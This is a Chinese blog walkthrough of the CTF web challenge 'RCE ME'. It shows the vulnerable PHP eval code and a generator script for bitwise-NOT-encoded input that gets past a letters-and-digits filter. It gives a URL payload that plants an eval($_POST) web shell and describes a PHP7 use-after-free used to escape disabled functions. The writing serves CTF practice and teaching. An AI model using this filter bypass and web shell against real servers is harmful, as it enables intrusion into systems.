[极客大挑战 2019]RCE ME

最新推荐文章于 2022-12-06 17:40:56 发布
最新推荐文章于 2022-12-06 17:40:56 发布
阅读量1.9k 收藏
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107760421
版权

题目

 <?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

过程
1.存在正则匹配过滤。使用取反或者异或绕过。这里使用取反。
php -r "echo urlencode(~'phpinfo');"
图片.png
禁用非常之多的系统函数。
图片.png
2.构造shell,连接antsword。

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[a]))';
$d=urlencode(~$c);
echo $d;
 ?>

payload:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);
连接成功
3.无法读取flag,考虑到rce,又禁用那么多系统函数。利用PHP7的UAF。antsword有插件可以直接使用。
图片.png
先运行poc,再运行readflag,即可完成。
图片.png

浩歌已行
关注
[极客挑战 2019]RCE ME 1
plant1234的博客
06-24 3239
首先打开题目得到: 发现是代码审计传入的code不能大于40并且不能包含a到z的大小写字符和1到10的数字我们可以通过不在这个字符集里的字符进行绕过可以采用异或和取反这里我采用取反,绕过执行phpinfo();playload: 执行:发现对一些行数进行控制: 写一句话: 在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。 在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造...
[极客挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 438
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1077
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
BUUCTF[极客挑战 2019]RCE ME1
wyp106343873的博客
12-06 1084
一个个人的学习过程
极客挑战 2019]RCE ME
zxnimud5的专栏
09-12 320
给了源码,过滤了大小写数字,小于40长度 error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("ThisistooLong."); ...
BUUCTF:[极客挑战 2019]RCE ME
末初的CSDN博客
03-27 8614
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编码绕过 PS C:\Users\Administrator> php -r "echo urlencode(~'phpinfo');" ...
CTF-Web-[极客挑战 2019]RCE ME
归子莫的博客
05-04 3506
CTF-Web-[极客挑战 2019]RCE ME 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]RCE ME 打开题目的实例 思路 把代码拿过来 <?ph...
ctfshow RCE极限挑战
最新发布
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的控制。其中,ctfshow是一个POST参数,用于接收选手注入的代码。如果选手注入的代码中包含恶意代码,就可以实现RCE攻击。这个挑战的难度较高,需要选手具备一定的安全知识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值